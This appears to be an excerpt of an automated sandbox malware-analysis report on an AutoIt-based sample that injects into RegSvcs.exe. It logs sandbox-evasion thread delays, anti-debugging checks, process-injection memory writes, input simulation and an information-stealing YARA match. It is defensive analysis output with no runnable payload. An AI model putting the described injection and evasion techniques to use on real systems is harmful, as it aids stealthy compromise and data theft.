                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeAPI/Special instruction interceptor: Address: E55EC4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599891Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599766Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599656Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599544Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599435Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599308Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599188Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599078Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598943Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598469Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598339Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598112Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597985Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597870Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597728Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597616Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597512Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597391Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597281Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597169Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597047Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596922Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596813Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596688Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596578Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596469Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596344Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596235Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596110Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595985Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595860Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595733Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595625Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595515Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595406Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595282Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595157Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595044Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594922Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594766Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594563Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594174Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594047Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593911Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593782Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593657Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593532Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593422Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593313Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593188Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593063Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 592943Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 592813Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 5414Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 4401Jump to behavior
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_5-105602
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeAPI coverage: 4.7 %
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_0086445A GetFileAttributesW,FindFirstFileW,FindClose,5_2_0086445A
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_0086C6D1 FindFirstFileW,FindClose,5_2_0086C6D1
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_0086C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,5_2_0086C75C
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_0086EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_0086EF95
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_0086F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_0086F0F2
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_0086F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,5_2_0086F3F3
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_008637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_008637EF
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_00863B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_00863B12
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_0086BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,5_2_0086BCBC
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_008049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,5_2_008049A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599891Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599766Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599656Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599544Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599435Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599308Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599188Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599078Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598943Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598469Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598339Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598112Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597985Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597870Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597728Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597616Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597512Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597391Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597281Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597169Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597047Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596922Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596813Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596688Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596578Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596469Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596344Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596235Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596110Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595985Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595860Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595733Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595625Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595515Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595406Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595282Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595157Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595044Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594922Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594766Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594563Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594174Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594047Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593911Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593782Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593657Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593532Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593422Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593313Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593188Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593063Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 592943Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 592813Jump to behavior
                Source: RegSvcs.exe, 00000008.00000002.3730410254.0000000000A58000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeAPI call chain: ExitProcess graph end nodegraph_5-104158
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_00873F09 BlockInput,5_2_00873F09
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_00803B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,5_2_00803B3A
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_00835A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,5_2_00835A7C
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_00804B37 LoadLibraryA,GetProcAddress,5_2_00804B37
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_00E56190 mov eax, dword ptr fs:[00000030h]5_2_00E56190
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_00E56130 mov eax, dword ptr fs:[00000030h]5_2_00E56130
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_00E54B00 mov eax, dword ptr fs:[00000030h]5_2_00E54B00
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_008580A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,5_2_008580A9
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_0082A124 SetUnhandledExceptionFilter,5_2_0082A124
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_0082A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_0082A155
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 587008Jump to behavior
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_008587B1 LogonUserW,5_2_008587B1
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_00803B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,5_2_00803B3A
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_008048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,5_2_008048D7
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_00864C27 mouse_event,5_2_00864C27
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\JWPRnfqs3n.exe"Jump to behavior
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_00857CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,5_2_00857CAF
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_0085874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,5_2_0085874B
                Source: JWPRnfqs3n.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: JWPRnfqs3n.exeBinary or memory string: Shell_TrayWnd
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_0082862B cpuid 5_2_0082862B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_00834E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,5_2_00834E87
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_00841E06 GetUserNameW,5_2_00841E06
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_00833F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,5_2_00833F3A
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_008049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,5_2_008049A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 8.2.RegSvcs.exe.370000.0.unpack, type: UNPACKEDPE
